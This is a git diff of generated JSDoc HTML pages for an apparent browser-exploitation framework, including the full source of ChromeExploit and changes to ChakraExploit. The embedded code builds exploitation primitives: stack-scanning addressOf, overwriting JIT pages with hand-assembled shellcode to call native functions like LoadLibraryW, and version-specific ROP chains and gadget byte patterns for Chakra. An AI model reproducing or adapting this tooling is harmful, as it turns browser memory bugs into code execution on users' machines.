+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer type. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
base + + +Type + + + + Base type
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
    • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_StructPointer.html b/docs/ChromeExploit_StructPointer.html new file mode 100644 index 0000000..a284bb3 --- /dev/null +++ b/docs/ChromeExploit_StructPointer.html @@ -0,0 +1,252 @@ + + + + + StructPointer - Documentation + + + + + + + + + + + + + + + + +
+ +

StructPointer

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + StructPointer +

+ + +
+ +
+
+ + + + + +

new StructPointer(base, address)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer to a structure type. Internal. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
base + + +Type + + + + type
address + + +Integer + + + +
+ + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_StructType.html b/docs/ChromeExploit_StructType.html new file mode 100644 index 0000000..42bbea5 --- /dev/null +++ b/docs/ChromeExploit_StructType.html @@ -0,0 +1,283 @@ + + + + + StructType - Documentation + + + + + + + + + + + + + + + + +
+ +

StructType

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + StructType +

+ + +
+ +
+
+ + + + + +

new StructType(fields, alignmentopt)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a structure type. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeAttributesDescription
fields + + +Array + + + + + + + + + + Description of structure's fields
alignment + + +integer + + + + + + <optional>
+ + + + + + 		Override default alignment
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Type
    • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_Type.html b/docs/ChromeExploit_Type.html new file mode 100644 index 0000000..49102a6 --- /dev/null +++ b/docs/ChromeExploit_Type.html @@ -0,0 +1,180 @@ + + + + + Type - Documentation + + + + + + + + + + + + + + + + +
+ +

Type

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + Type +

+ + +
+ +
+
+ + + + + +

new Type()

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Type base class. Internal. +
+ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/ChromeExploit_WString.html b/docs/ChromeExploit_WString.html new file mode 100644 index 0000000..f53c0f8 --- /dev/null +++ b/docs/ChromeExploit_WString.html @@ -0,0 +1,240 @@ + + + + + WString - Documentation + + + + + + + + + + + + + + + + +
+ +

WString

+ + + + + + + +
+ +
+ +

+ ChromeExploit# + + WString +

+ + +
+ +
+
+ + + + + +

new WString(s)

+ + + + + + +
+ + +
Source:
+
+ + + + + + + +
Inherited From:
+
+ + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +
+ Constructs a pointer to a UTF-16 string. +
+ + + + + + + + + + + +
Parameters:
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameTypeDescription
s + + +string + + + + A string to make into a UTF-16 string.
+ + + + + + + + + + + + + + + + + +
+ + +

Extends

+ + + + +
    +
  • Pointer
    • +
+ + + + + + + + + + + + + + + + + + + +
+ +
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + \ No newline at end of file diff --git a/docs/baseexploit.js.html b/docs/baseexploit.js.html index c3a9320..6880758 100644 --- a/docs/baseexploit.js.html +++ b/docs/baseexploit.js.html @@ -22,7 +22,7 @@
@@ -56,17 +56,23 @@

baseexploit.js

var exploit = this; function cString(s) { - var ss = ''; - for (var i = 0; i < s.length / 2 + 2; i++) { - ss += String.fromCharCode((s.charCodeAt(i*2)|0) + ((s.charCodeAt(i*2+1)|0) << 8)); + var u8 = new Uint8Array(s.length + 1); + for (var i = 0; i < s.length; i++) { + u8[i] = s.charCodeAt(i); } - return wString(ss); + u8[i] = 0; + strings.push(u8); + return exploit.addressOfArrayBuffer(u8.buffer); } function wString(s) { - strings.push(s); - parseInt(s); - return exploit.addressOfString(s); + var u16 = new Uint16Array(s.length + 1); + for (var i = 0; i < s.length; i++) { + u16[i] = s.charCodeAt(i); + } + u16[i] = 0; + strings.push(u16); + return exploit.addressOfArrayBuffer(u16.buffer); } function getProcAddress(library, procName) { @@ -132,6 +138,7 @@

baseexploit.js

} else { target.add(idx).store(value); } + return true; }, }; @@ -614,6 +621,7 @@

baseexploit.js

Object.assign(this, { importFunction, + loadLibrary, Pointer, CString, WString, @@ -686,7 +694,7 @@

baseexploit.js

} } for (var j = 0; j < bytesLength; j++) { - if (bytes[j] != p[i + j]) { + if (bytes[j] >= 0 && bytes[j] != p[i + j]) { break; } } @@ -715,6 +723,9 @@

baseexploit.js

array[i / 4] = x.low; array[i / 4 + 1] = x.high; address.low += 8; + if ((address.low|0) == 0) { + address.high += 1; + } } var byteArray = new Uint8Array(array.buffer); @@ -728,7 +739,7 @@

baseexploit.js

throw 'missing gadget ' + name; } for (var j = 1; j < bytes.length; j++) { - if (byteArray[idx + j] != bytes[j]) { + if (bytes[j] >= 0 && byteArray[idx + j] != bytes[j]) { break; } } @@ -755,7 +766,7 @@

baseexploit.js


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/chakraexploit.js.html b/docs/chakraexploit.js.html index 5cbd8f3..8a75bf9 100644 --- a/docs/chakraexploit.js.html +++ b/docs/chakraexploit.js.html @@ -22,7 +22,7 @@
@@ -111,22 +111,34 @@

chakraexploit.js

['jmpGetProcAddress', [0x48, 0x8B, 0xC1, 0x48, 0x8B, 0x49, 0x08, 0x48, 0x85, 0xC9, 0x74, 0x0B, 0x48, 0x83, 0xC4, 0x28, 0x48, 0xFF, 0x25]], ['nopReturn', [0xC3]], ['popRaxReturn', [0x58, 0xC3]], - ['popRcxReturn', [0x59, 0xC3]], ['popRdxReturn', [0x5A, 0xC3]], ['popRspReturn', [0x5C, 0xC3]], ['popRbpReturn', [0x5D, 0xC3]], - ['popRsiReturn', [0x5E, 0xC3]], ['addRsp58Return', [0x48, 0x83, 0xC4, 0x58, 0xC3]], ['storeRaxAtRdxReturn', [0x48, 0x89, 0x02, 0xC3]], - ['entrySlice', [0x8B, 0xF8, 0x41, 0x83, 0xFC, 0x02]], - ['amd64CallFunction', [0x4C, 0x8B, 0x4E, 0x08, 0x4C, 0x8B, 0x06, 0x48, 0x83, 0xEC, 0x20, 0xFF, 0xD0, 0x48, 0x8B, 0xE5, 0x5D, 0x5F, 0x5E, 0x5B, 0xC3]], - ['linkToBeginningThreadContext', [0x48, 0x8B, 0xC4, 0x4C, 0x89, 0x40, 0x18, 0x48, 0x89, 0x50, 0x10, 0x48, 0x89, 0x48, 0x08, 0x48, 0x83, 0x61]], + ['entrySlice', [0x8B, 0xF8, 0x41, 0x83, -1, 0x02]], + ['amd64CallFunction', [0x4C, 0x8B, 0x4E, 0x08, 0x4C, 0x8B, 0x06, 0x48, 0x83, 0xEC, 0x20, 0xFF]], + ['linkToBeginningThreadContext', [0x48, 0x8B, 0xC4, 0x4C, 0x89, 0x40, 0x18, 0x48, 0x89, 0x50, 0x10, 0x48, 0x89, 0x48, 0x08, 0x48, 0x83, -1, -1, 0x00]], + ['popRcxRdxR8R9Return', [0x48, 0x8B, 0x4C, 0x24, 0x08, 0x48, 0x8B, 0x54, 0x24, 0x10, 0x4C, 0x8B, 0x44, 0x24, 0x18, 0x4C, 0x8B, 0x4C, 0x24, 0x20, 0x48, 0xFF, 0xE0]], + ['addRsp28Return', [0x48, 0x83, 0xC4, 0x28, 0xC3]], ]; this.gadgets = this.findGadgets(this.chakraBase, gadgets); + // amd64CallFunction was changed in 1709, so the offset to after the call is different + // call rax (FF D0) + // call __guard_dispatch_icall_fptr (FF 15 ...) + this.amd64CallFunctionReturnOffset = this.gadgets.amd64CallFunction[12] == 0xD0 ? 13 : 17; // initialize ThreadContext information - this.threadContextPrev = this.gadgets.linkToBeginningThreadContext[18] / 8; - this.threadContextNext = this.gadgets.linkToBeginningThreadContext[30] / 8; - this.globalListFirst = new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(27).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(23))[0])); + if (this.gadgets.linkToBeginningThreadContext[17] == 0x61) { + this.threadContextPrev = this.gadgets.linkToBeginningThreadContext[18] / 8; + this.threadContextNext = this.gadgets.linkToBeginningThreadContext[30] / 8; + this.globalListFirst = new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(27).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(23))[0])); + } else if (this.gadgets.linkToBeginningThreadContext[17] == 0xA1) { + this.threadContextPrev = this.gadgets.linkToBeginningThreadContext[18] / 8; + this.threadContextNext = this.gadgets.linkToBeginningThreadContext[33] / 8; + this.globalListFirst = new this.PointerType(this.Uint64Ptr).cast(this.Uint64.cast(this.gadgets.linkToBeginningThreadContext).add(30).add(this.Int32Ptr.cast(this.gadgets.linkToBeginningThreadContext.add(26))[0])); + } else { + throw 'unsupported version'; + } var p = this.globalListFirst[0]; for (var i = 0;; i++) { if ((p[i] & 0xffff) == 0xc000) { @@ -159,13 +171,15 @@

chakraexploit.js

return this.locateArrayPtr[0]; } /** - * Returns the address of a string. Points to the string's bytes. + * Returns the address of ArrayBuffer contents. * - * @param {string} s A Javascript string + * @param {ArrayBuffer} ab ArrayBuffer * @returns {Pointer} */ -ChakraExploit.prototype.addressOfString = function (s) { - return this.Uint64Ptr.cast(this.addressOf(s).add(0x10)).load(); +ChakraExploit.prototype.addressOfArrayBuffer = function (ab) { + var dv = new DataView(ab); + var p = this.Uint64Ptr.cast(this.addressOf(dv)); + return p[7]; } ChakraExploit.prototype.findStackTop = function () { if (this.stackTop === undefined) { @@ -202,7 +216,7 @@

chakraexploit.js

throw 'unable to find entrySlice'; } } - while (!this.Uint64.cast(gadgets.amd64CallFunction).add(13).eq(stk.load())) { + while (!this.Uint64.cast(gadgets.amd64CallFunction).add(this.amd64CallFunctionReturnOffset).eq(stk.load())) { stk = stk.add(1); if (stk.address >= this.stackTop) { throw 'unable to find amd64CallFunction'; @@ -241,7 +255,7 @@

chakraexploit.js

eval('String.prototype.slice').call('', { valueOf: () => { var gadgets = this.gadgets; - var amd64CallFunction = this.Uint64.cast(gadgets.amd64CallFunction).add(13); + var amd64CallFunction = this.Uint64.cast(gadgets.amd64CallFunction).add(this.amd64CallFunctionReturnOffset); var entrySlice = this.Uint64.cast(gadgets.entrySlice); var stackBottom = this.stackTop.sub(0x10000); var stk = this.customInt32Array(stackBottom); @@ -280,34 +294,27 @@

chakraexploit.js

// ROP chain // skip saved rbp, rdi, rsi, rbx i = 4; - // pop r8 and r9 using code in amd64_CallFunction - write64(i32, i, gadgets.popRsiReturn); - i++; - write64(i32, i, stk); - i++; - if (args[2] !== undefined) - write64(i32, 0, args[2]); // r8 - if (args[3] !== undefined) - write64(i32, 1, args[3]); // r9 write64(i32, i, gadgets.popRaxReturn); i++; - write64(i32, i, gadgets.nopReturn); - i++; - write64(i32, i, gadgets.popRbpReturn); + write64(i32, i, gadgets.addRsp28Return); i++; - write64(i32, i, stk.add(i - 2)); + write64(i32, i, gadgets.popRcxRdxR8R9Return); i++; - write64(i32, i, gadgets.amd64CallFunction); + // unused i++; - write64(i32, i, gadgets.popRdxReturn); + if (args[0] !== undefined) + write64(i32, i, args[0]); // rcx i++; if (args[1] !== undefined) - write64(i32, i, args[1]); + write64(i32, i, args[1]); // rdx i++; - write64(i32, i, gadgets.popRcxReturn); + if (args[2] !== undefined) + write64(i32, i, args[2]); // r8 i++; - if (args[0] !== undefined) - write64(i32, i, args[0]); + if (args[3] !== undefined) + write64(i32, i, args[3]); // r9 + i++; + write64(i32, i, gadgets.nopReturn); // fix stack alignment i++; write64(i32, i, address); i++; @@ -373,7 +380,7 @@

chakraexploit.js


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/chakrathreadexploit.js.html b/docs/chakrathreadexploit.js.html index 3f32ac0..86f1c63 100644 --- a/docs/chakrathreadexploit.js.html +++ b/docs/chakrathreadexploit.js.html @@ -22,7 +22,7 @@
@@ -121,7 +121,7 @@

chakrathreadexploit.js


- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/chromeexploit.js.html b/docs/chromeexploit.js.html new file mode 100644 index 0000000..b782bae --- /dev/null +++ b/docs/chromeexploit.js.html @@ -0,0 +1,296 @@ + + + + + chromeexploit.js - Documentation + + + + + + + + + + + + + + + + +
+ +

chromeexploit.js

+ + + + + + + +
+
+ 
import BaseExploit from "baseexploit";
+import Integer from "integer";
+
+/**
+ * Constructs an exploit with sensible defaults for Chrome. Child must call initChrome method once read and write methods are available.
+ *
+ * @augments BaseExploit
+ * @class
+ * @constructor
+ */
+function ChromeExploit() {
+    var exploit = this;
+    BaseExploit.call(this, 64);
+}
+ChromeExploit.prototype = Object.create(BaseExploit.prototype);
+ChromeExploit.prototype.constructor = ChromeExploit;
+/**
+ * Initializes Chrome helpers using memory read and write.
+ *
+ * @param {Integer|Pointer} vtable Any address in the chrome DLL
+ */
+ChromeExploit.prototype.initChrome = function (vtable) {
+    this.chromeBase = this.findModuleBase(vtable);
+
+    /* Create a Function with a large amount of JIT code. */
+    var source = '';
+    for (var i = 0; i < 1000; i++) {
+        source += 'x[' + i + '] += ' + Math.random() + ';\n';
+    }
+    this.jitFunction = new Function('x', source);
+    var arr = new Array(1000).fill(0);
+    for (var i = 0; i < 10000; i++) {
+        this.jitFunction(arr);
+    }
+
+    /* Find g_main_thread_stack_start via code pattern matching. */
+    var gadgets = [
+        ['loadLibraryGetProcAddress', [0x48, 0x8D, 0x0D, -1, -1, -1, -1, 0xFF, 0x15, -1, -1, -1, -1, 0x48, 0x8B, 0xF8, 0x48, 0x85, 0xC0, 0x0F, 0x84, -1, -1, -1, -1, 0x48, 0x8D, 0x15, -1, -1, -1, -1, 0x48, 0x8B, 0xC8, 0xFF, 0x15, -1, -1, -1, -1]],
+        ['mainThreadStack', [0x48, 0x8B, 0x05, -1, -1, -1, -1, 0x48, 0x8D, 0x4C, 0x24, -1, 0x48, 0x2B, 0xC1, 0x48, 0x8D, 0x1D, -1, -1, -1, -1, 0x48, 0x3B, 0x05, -1, -1, -1, -1]],
+    ];
+    this.gadgets = this.findGadgets(this.chromeBase, gadgets);
+    this.mainThreadStackBase = new this.PointerType(this.Uint64Ptr).cast(
+        this.Uint64.cast(this.gadgets.mainThreadStack).add(7).add(
+            this.Int32Ptr.cast(this.gadgets.mainThreadStack.add(3))[0])
+    )[0];
+    this.LoadLibraryW = new this.PointerType(this.Uint64Ptr).cast(
+        this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(13).add(
+            this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(9))[0])
+    )[0];
+    this.GetProcAddress = new this.PointerType(this.Uint64Ptr).cast(
+        this.Uint64.cast(this.gadgets.loadLibraryGetProcAddress).add(41).add(
+            this.Int32Ptr.cast(this.gadgets.loadLibraryGetProcAddress.add(37))[0])
+    )[0];
+}
+/**
+ * Returns the address of a Javascript object.
+ *
+ * @param {*} obj Any Javascript object
+ * @returns {Pointer}
+ */
+ChromeExploit.prototype.addressOf = function (obj) {
+    /* TODO: Implement faster version using a predefined Array. */
+    var arr = [obj];
+    return this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOfSlow(arr))[2].sub(1))[2].sub(1);
+}
+/**
+ * Returns the address of ArrayBuffer contents.
+ *
+ * @param {ArrayBuffer} ab ArrayBuffer
+ * @returns {Pointer}
+ */
+ChromeExploit.prototype.addressOfArrayBuffer = function (ab) {
+    var p = this.Uint64Ptr.cast(this.addressOf(ab));
+    return p[4];
+}
+/**
+ * Returns the address of a Javascript object. Internal.
+ *
+ * @param {*} obj Any Javascript object
+ * @returns {Pointer}
+ */
+ChromeExploit.prototype.addressOfSlow = function (obj) {
+    var address;
+    var canary1 = 0x13371338, canary2 = 0x1339133a, mainThreadStackBase = this.mainThreadStackBase;
+    obj.toString = function() {
+        /* Search stack for canary values. */
+        for (var i = 0; i > -0x1000; i--)
+        {
+            if (mainThreadStackBase[i - 2].high == canary2 && mainThreadStackBase[i - 1].high == canary1)
+            {
+                address = mainThreadStackBase[i].sub(1);
+                break;
+            }
+        }
+        return '';
+    };
+    String.prototype.indexOf.call(obj, canary1, canary2);
+    return address;
+}
+/**
+ * Call a function pointer with the given arguments. Used internally by FunctionPointer.
+ *
+ * @param {Integer} address
+ * @param {...Integer} args
+ * @returns {Integer}
+ */
+ChromeExploit.prototype.call = function (address, ...args) {
+    var self = this;
+    function validObjectAddress(x) {
+        return x.high <= 0x7FFF && (x.low & 7) == 1;
+    }
+    function addRspImm8(p, imm) {
+        p[0] = 0x48;
+        p[1] = 0x83;
+        p[2] = 0xc4;
+        p[3] = imm;
+        return p.add(4);
+    }
+    function callRax(p) {
+        p[0] = 0xff;
+        p[1] = 0xd0;
+        return p.add(2);
+    }
+    function movRaxImm64(p, imm) {
+        p[0] = 0x48;
+        p[1] = 0xb8;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function movRcxImm64(p, imm) {
+        p[0] = 0x48;
+        p[1] = 0xb9;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function movRdxImm64(p, imm) {
+        p[0] = 0x48;
+        p[1] = 0xba;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function movR8Imm64(p, imm) {
+        p[0] = 0x49;
+        p[1] = 0xb8;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function movR9Imm64(p, imm) {
+        p[0] = 0x49;
+        p[1] = 0xb9;
+        self.Uint64Ptr.cast(p.add(2))[0] = imm;
+        return p.add(10);
+    }
+    function pushRax(p) {
+        p[0] = 0x50;
+        return p.add(1);
+    }
+    function storeRax(p, dst) {
+        p[0] = 0x48;
+        p[1] = 0xa3;
+        self.Uint64Ptr.cast(p.add(2))[0] = dst;
+        return p.add(10);
+    }
+    function prologue(p) {
+        /* push rbp */
+        p[0] = 0x55;
+        p[1] = 0x48;
+        /* mov rbp, rsp */
+        p[2] = 0x89;
+        p[3] = 0xe5;
+        /* and rsp, ~0xf */
+        p[4] = 0x48;
+        p[5] = 0x83;
+        p[6] = 0xe4;
+        p[7] = 0xf0;
+        return p.add(8);
+    }
+    function epilogue(p) {
+        p[0] = 0xc9;
+        p[1] = 0xc3;
+        return p.add(2);
+    }
+    function jmp(p, offset) {
+        p[0] = 0xe9;
+        self.Int32Ptr.cast(p.add(1))[0] = offset;
+        return p.add(5);
+    }
+
+    var codeObject = this.Uint64Ptr.cast(this.Uint64Ptr.cast(this.addressOf(this.jitFunction))[7].sub(1));
+    if (validObjectAddress(codeObject[0]) && validObjectAddress(codeObject[1]) &&
+            validObjectAddress(codeObject[2]) && validObjectAddress(codeObject[3])) {
+        /* In newer versions of Chrome, function object points to the code header. */
+        var jitCode = this.Uint8Ptr.cast(codeObject).add(0x60);
+    } else {
+        /* In older versions of Chrome, function object points to the JIT code. */
+        var jitCode = this.Uint8Ptr.cast(codeObject);
+    }
+    var returnValAddress = this.Uint64Ptr.cast(jitCode.add(0x200));
+
+    /* Keep the stack aligned by pushing an even number of stack arguments. */
+    if (args.length > 4 && (args.length & 1)) {
+        args.push(0);
+    }
+
+    var p = jitCode;
+    /* Jump over code with heap pointers that get used during GC. */
+    p = jmp(p, 0x1000).add(0x1000);
+    /* Overwrite the JIT code with shellcode to load arguments and call function. */
+    p = prologue(p);
+    for (var i = args.length - 1; i >= 0; i--) {
+        if (i == 0) {
+            p = movRcxImm64(p, args[i]);
+        } else if (i == 1) {
+            p = movRdxImm64(p, args[i]);
+        } else if (i == 2) {
+            p = movR8Imm64(p, args[i]);
+        } else if (i == 3) {
+            p = movR9Imm64(p, args[i]);
+        } else {
+            p = movRaxImm64(p, args[i]);
+            p = pushRax(p);
+        }
+    }
+    p = addRspImm8(p, -0x20);
+    p = movRaxImm64(p, address);
+    p = callRax(p);
+    p = addRspImm8(p, 0x20);
+    p = storeRax(p, returnValAddress);
+    p = epilogue(p);
+
+    /* Call the JIT code. */
+    this.jitFunction();
+
+    /* Retrieve the return value. */
+    return returnValAddress[0];
+}
+
+export default ChromeExploit;
+
+
+
+ + + + +
+ +
+ +
+ Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme. +
+ + + + + diff --git a/docs/global.html b/docs/global.html index c8a11c1..127c26c 100644 --- a/docs/global.html +++ b/docs/global.html @@ -22,7 +22,7 @@
@@ -192,7 +192,7 @@

Integer
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/global.html#Integer b/docs/global.html#Integer index 66c042f..a13395f 100644 --- a/docs/global.html#Integer +++ b/docs/global.html#Integer @@ -22,7 +22,7 @@
@@ -7933,7 +7933,7 @@
- Documentation generated by JSDoc 3.5.5 on Sun Nov 12 2017 13:46:00 GMT+0900 (KST) using the docdash theme. + Documentation generated by JSDoc 3.5.5 on Sat Mar 31 2018 18:23:08 GMT-0700 (PDT) using the docdash theme.
diff --git a/docs/index.html b/docs/index.html index bd3ef69..691d476 100644 --- a/docs/index.html +++ b/docs/index.html @@ -22,7 +22,7 @@
@@ -46,9 +46,10 @@

Home

Classes